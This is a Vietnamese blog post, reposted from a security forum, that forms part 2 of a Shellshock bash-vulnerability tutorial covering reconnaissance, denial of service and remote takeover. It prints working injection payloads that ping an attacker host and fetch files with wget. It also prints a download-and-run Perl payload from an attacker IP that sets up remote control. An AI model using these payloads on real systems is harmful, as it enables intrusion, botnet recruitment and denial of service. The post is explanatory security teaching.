Inside Shellshock: Cách mà hacker dùng để khai thác hệ thống! (P2)

Tiếp tục bài phần 1 về kĩ thuật Shellshock...:-)! Phần trước chúng ta đã nói về kĩ thuật Shellshock bắt nguồn từ đâu và mở rộng trong việc s...

Tiếp tục bài phần 1 về kĩ thuật Shellshock...:-)!
Phần trước chúng ta đã nói về kĩ thuật Shellshock bắt nguồn từ đâu và mở rộng trong việc sử dụng Shellshock để kiểm soát mục tiêu.
Phần này chúng ta sẽ tiếp tục mở rộng, ứng dụng kĩ thuật Shellshock cho các mục đích tấn công mục tiêu thực tế!. Reconnaissance

Trong một cuộc tấn công "reconnaissance"(tạm gọi là trinh sát mục tiêu), kẻ tấn công gửi những dòng lệnh đến một máy bên thứ ba. Máy của bên thứ ba sẽ lên danh sách các máy dễ bị tấn công và cùng gửi yêu cầu đến mục tiêu.

Trong thực tế, các danh sách đó cùng nhau gửi yêu cầu, xây dựng thành botnet để tấn công DDos, spam hoặc các mục đích khác. Nhưng phổ biến nhất vẫn là botnet cho các vụ tấn công DDos.

Một kĩ thuật phổ biến là sử dụng lệnh ping để máy bên thứ ba nhận được yêu cầu từ máy mục tiêu. Lệnh sẽ được thực hiện như sau:

Mã:
 
() {:;}; ping -c 1 -p cb18cb3f7bca4441a595fcc1e240deb0 attacker-machine.com
Lệnh ping thường được sử dụng để kiểm tra xem một máy có đang trực tuyến hoặc vẫn còn hoạt động trên internet(những máy trực tuyến sẽ phản hồi với các flag riêng trong gói icmp). Nếu một máy chủ web gặp lỗi Shellshock, nó sẽ gửi một gói icmp đến attacker-machine.com với payload được đặt bởi option -p . Các payload là một ID được xác định bởi kẻ tấn công để theo dõi cái gói ping phản hồi từ các trang web gặp lỗ hổng.
Click image for larger version  Name: illustration-bash-blog.png Views: 1 Size: 18,8 KB ID: 59869



Mô hình khai thác một máy chủ web với lổ hổng Shellshock

Một kĩ thuật khác nữa là để cho máy chủ web mục tiêu tải về một script, webpage hoặc bất kì file, có thể hoặc không thể thực thi từ máy chủ web tấn công. Các kẻ tấn công sẽ tìm kiếm trong các log của máy chủ web để tìm thấy các máy chủ web mục tiêu gặp phải lỗ hổng. Cuộc tấn bắt đầu với chuỗi Shellshock như sau:

Mã:
 
() {:;}; /usr/bin/wget http://attacker-controlled.com/ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA== >> /dev/null
Các kẻ tấn công sau đó sẽ tìm kiếm trong các bản log của máy attacker-controlled để tìm ra các web server gặp lỗ hổng Shellshock đã tải xuống file. Từ đó, các kẻ tấn công sẽ tiếp tục khai thác các máy chủ web đó. Denial of Service

Một cuộc tấn công sử dụng Shellshock có chuỗi tấn công như sau:

Mã:
 
() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20
Đoãn mã trên cố gắng để thực hiện lệnh sleep theo ba cách khác nhau(đối với các hệ thống khác nhau thì mã nguồn lệnh sleep sẽ được cấu hình tại các đường dẫn khác nhau; nằm trong /bin hoặc /sbin hoặc /usr). Mỗi khi mã lệnh sleep chạy, nó khiến cho các máy chủ sẽ phải chờ 20s trước khi phản hồi lại. Điều này sẽ gây ra việc tiêu thụ tài nguyên trên máy mục tiêu, một thread hoặc một process thực thi mã lệnh sleep sẽ không làm bất kì gì khác trong 20s, đó là cơ sở trong các cuộc tấn công Dos, chỉ đơn giản là việc khiến cho máy chủ web mục tiêu sẽ không thể làm gì trong vòng 20s(Thực sự đó là một cuộc tấn công từ chối dịch vụ đơn giản nhất).

Mở rộng trong các cuộc tấn công Dos hoặc DDos thông qua Shellshock sẽ là thực thi các mã lệnh hoặc tải về và thực thi các script trên máy mục tiêu, tùy thuộc vào kẻ tấn công sẽ khai thác như thế nào!. :-)

Click image for larger version  Name: 3894184210_47762c00a9_z.jpg Views: 1 Size: 114,3 KB ID: 59870

Taking Control - Giành quyền kiểm soát

Một số ít trong việc khai thác lỗ hổng Shellshock đó là thực hiện kiểm soát máy mục tiêu. Các cuộc tấn công sẽ gửi đi những payload tương tự như sau:

Mã:
 
() { :;}; /bin/bash -c \"cd /tmp;wget http://200.x.x.x/ji;curl -O /tmp/ji http://200.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji\"
Payload trên sẽ cố gắng để thực thi 2 lệnh wget và curl để tải về một script từ máy chủ của kẻ tấn công. Script được viết bằng ngôn ngữ Perl và ngay lập tức thực thi sau khi được tải về, script sẽ thiết lập điều khiển từ xa cho các máy của kẻ tấn công.

Ứng dụng của việc khai thác lổ hổng Shellshock rất rộng, tùy thuộc vào khả năng lập trình của hacker. Một khi đã giành được quyền kiểm soát máy mục tiêu thì ta có thể tổ chức các botnet cho các cuộc tấn công DDos, ứng dụng kĩ thuật tấn công Phishing, Social Engineering cho các mục đích cá nhân, khai thác thông tin hoặc trao đổi thông tin v..v..

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Trên đây là một số kiến thức về kĩ thuật khai thác lổ hổng Shellshock và các hình thức mở rộng tấn công tùy vào mục đích cá nhân của cuộc tấn công. Hy vọng bài viết sẽ mang lại một vài kiến thức hữu cho các bạn mới tiếp cận với việc khai thác lổ hổng web.
Xin cám ơn!

https://whitehat.vn/forum/thao-luan/web-security/59868-inside-shellshock-cach-ma-hacker-dung-de-khai-thac-he-thong-p2

COMMENTS

Tên

.:: Connect Trojan ::.,111,.htaccess,2,0-day,3,2017,2,Add-on,16,Affiliate,1,Anotador,1,AutoIT,17,BackDoor,1,Bán Sách,13,banhangonline,1,Bảo Mật,173,Bất Động Sản Tại Tiền Giang,5,Bestsellers,13,Binder,1,blog,31,Blogger,4,Blogger Template,1,Botnet,3,Brute,1,Bug Bounty,1,Bypass,10,camera,1,ceh,1,Châu Tinh Trì,2,Checked,6,Chrome,21,Code,5,coin hive,1,Coin-Hive,2,CoinHive,1,Connect Trojan,342,Connect Trojan ::.,1,Cổ Tích,2,Crack,3,Crypto,5,CSRF,5,CSS,2,Cuộc Sống,1,Dau tu,8,DDoS,6,Designer,1,Dich vụ,1,DNS,4,Download,2,du-an,3,DVD LUMION Tiếng Việt của anh Dũng Già Pro,1,Đam Mỹ,1,điện,1,Đồ Họa,215,Đô Thị,16,e11.me,1,ebook,17,ebook free,295,eBook Phệ Hồn Nghịch Thiên,1,eBook Thịnh Thế Địch Phi,1,Encrypt,1,Encryption,1,epub,76,epub [Tiên hiệp],1,ET-Logger,1,exploit,23,Exploitation,1,Extractor,2,facebook,69,FireFox,15,Flood,2,Forensic,7,full prc,2,game,177,Gerador,3,Gerenciador,1,Get Root,3,GHDB,3,Giả Tưởng,1,giaitri,1,Google,15,H&Y Shop,2,Hacker,3,Hacking,16,Hacking and Security,6,Hacking Tools,36,Hành Động,3,He Thong Site Phim,25,Hijacking,6,Hình Sự,1,hivecoin.hive coin,1,Hỏi Xoáy Đáp Xoay Trên VTV3,1,HTML,1,Huyền Ảo,92,Hướng dẫn Internet cơ bản,1,IFTTT,703,Imgur,2,Infographic,1,Information Disclosure,1,Internet Explorer,3,IT News,39,J2TeaM,29,J2TeaM Tools,9,JavaScript,6,Javascript Injection,3,Juno_okyo's Blog,23,Khóa Học,32,Khóa Học kiếm tiền online với accesstrade,5,khoá học miễn phí,16,Khóa học Photoshop,19,Khóa học sử dụng mã độc và phòng chống mã độc,2,Khoa Huyễn,6,khuyến mãi,16,kiemhiep,9,Kiếm Hiệp,20,Kiếm Tiền MMO,34,kiếm tiền rút gọn link,1,KilerRat,1,Kinh Dị,24,Kinh Dị - Ma,4,Kinh Doanh,73,kinhdi,1,kinhdoanh,5,KRACK Attacks,1,Lãng mạn,1,lazada,1,Lập trình,2,Lịch Sử,5,Linux,1,Local Attack,2,Logins/Cadastro,1,Lỗi Web,1,Lược Sử Hacker,2,Mã Giảm Giá,2,Mã Hóa,48,Malware,3,Master-Code,31,Máy Tính,1,Metasploit,2,Microsoft,4,mobile hacking,2,monero,1,Movie,25,MySQL,1,NEW PRODUCTS,19,NGHỆ THUẬT ẨN MÌNH,13,ngontinh,10,Ngôn Tình,151,nhà đất,1,Nhà Đất Gò Công,1,Nhân Vật Lịch Sử,2,Nhật Bản,1,Nhựt Trường Group,1,NjRat,5,Nước,1,open redirect,1,Oracle,1,Path Disclosure,2,pdf,76,Pen-Test,6,Pentest Box,9,Phan mem Internet,1,phanmem,23,phanmemdienthoai,3,phanmemmaytinh,10,phần mềm,11,Phim 18,2,Phim 2012,1,Phim 3D,1,Phim Âm Nhạc,2,Phim Bộ,39,Phim Chiến Tranh,5,Phim Dã Sử - Cổ Trang,6,Phim Đài Loan,6,Phim Đề Cử,4,Phim Hài Hước,26,Phim Hàn Quốc,33,Phim HD Chất Lượng Cao,5,Phim Hoạt Hình,2,Phim Hot,1,Phim Hồng Kông,20,Phim HQ,2,Phim Kinh Dị,8,Phim lẻ,4,Phim Mới 2011,2,Phim Mới 2012,1,Phim Mới 2015,1,Phim Nhật Bản,4,Phim SD,3,Phim Thái Lan,6,Phim Thần Thoại,4,Phim Tình Cảm,35,Phim Trung Quốc,37,Phim Truyền Hình,19,Phim Viễn Tưởng,1,Phim Võ Thuật,36,Phim Xã Hội Đen,1,Phishing,5,PHP,16,Plugin,1,Port,1,post mẫu,1,prc,77,Programming,15,Python,1,Quảng Cáo,1,rat,457,Recovery,3,Remote Code Execution,1,Remote Desktop,1,Reverse Engineering,6,review,3,rút gọn link,1,sach,47,Sách,37,Sách Nghệ Thuật Sống,12,sách nói,1,Sách Tâm Linh,1,Sách Tiếng Anh,2,sachiep,2,Sản Phẩm,1,Sắc Hiệp,16,Scam,1,Scanner,10,Security,66,SEO,5,share,1,Shell,5,shop,1,Social Engineering,4,Software,22,Source Unity,1,SQL injection,21,Sức Khỏe,1,Symlink,3,Tài Chính,1,Tài chính cá nhân,2,Tài Liệu,1,Tản mạn,7,Taudio,2,Tâm lý xã hội,1,tấn công,1,Testador,1,Thái Lan,2,Tham Khảo,3,thamkhao,11,them,1,Thiệp Cưới,1,Thiết Kế Web,30,Thời Trang,2,Thủ Thuật Hacking,53,Thuyết Minh,1,tienhiep,5,Tiên Hiệp,123,Tiểu Thuyết,94,tiki,3,TIL,8,Tin Tức,52,Tips,39,tool,1,Tool Hack,14,Tools,9,Tổng Hợp,1,Tricks,26,Trinh thám,1,trojan original,48,Trọng sinh,11,Trộm mộ,1,Trung Quốc,1,Truyện,1,Trương Định,110,Tu Chân,2,TUTORIALS,124,Twitter,1,Ung_Dung,4,Upload,1,usb,1,vanhoc,11,văn học,6,vBulletin,7,video,16,Vietsub,1,Việt Nam,4,Virus,4,Võ Thuật,3,Võng Du,5,Vulnerability,19,Web Developer,15,webmau,5,WHMCS,3,WiFi,2,wiki lỗi máy tinh,1,wiki lỗi NTG,3,Windows,12,WordPress,43,Write-up,11,XSS,16,Yahoo,1,yeah1offer,1,youtube,11,
ltr
item
NhutTruong.Com - Chia sẻ kiến thức miễn phí: Inside Shellshock: Cách mà hacker dùng để khai thác hệ thống! (P2)
Inside Shellshock: Cách mà hacker dùng để khai thác hệ thống! (P2)
https://whitehat.vn/filedata/fetch?id=59869&d=1475740818&type=full
NhutTruong.Com - Chia sẻ kiến thức miễn phí
https://www.nhuttruong.com/2016/10/inside-shellshock-cach-ma-hacker-dung-e.html
https://www.nhuttruong.com/
https://www.nhuttruong.com/
https://www.nhuttruong.com/2016/10/inside-shellshock-cach-ma-hacker-dung-e.html
true
7607280272436897486
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content